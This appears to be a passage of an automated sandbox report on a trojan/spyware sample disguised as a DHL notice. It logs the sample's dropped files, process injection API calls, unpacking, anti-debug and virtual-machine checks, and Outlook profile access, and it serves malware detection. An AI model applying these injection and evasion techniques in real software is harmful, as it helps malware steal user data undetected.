          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529560 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC870 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC840 NtDeleteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC920 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC740 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7F0 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC73B NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7EA NtReadFile,
          Source: DHL_Notice_pdf.exeReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\user\Desktop\DHL_Notice_pdf.exeJump to behavior
          Source: DHL_Notice_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_Notice_pdf.exe C:\Users\user\Desktop\DHL_Notice_pdf.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd7F3B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@14/7
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: DHL_Notice_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeUnpacked PE file: 3.2.zkvixbqxp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B1FB push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040DAA5 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B369 push es; retf
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041C4AA push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041BDCE push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401DF0 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00406F32 push C87026BFh; retf
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A4D0D1 push ecx; ret
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736F57 push ebx; retn 4855h
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73213D push ds; iretd
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736EC9 push cs; retf
          Source: C:\Windows\explorer.exeCode function: 4_2_1194113D push ds; iretd
          Source: C:\Windows\explorer.exeCode function: 4_2_11945EC9 push cs; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0453D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C513F push C87026BFh; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E0E65 push dword ptr [057DC0C6h]; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DA6B7 push ecx; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9FDB push esp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9408 push esi; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CBCB2 push edi; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9576 push es; retf
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 5172Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5128Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A26A60 rdtscp
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.4 %
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_004207DA GetSystemInfo,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000003.473645916.000000000F4FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.514671889.000000000F4FD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.253345613.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.250169139.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000002.514284558.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A26A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_00420109 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042005F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042017B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042013E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
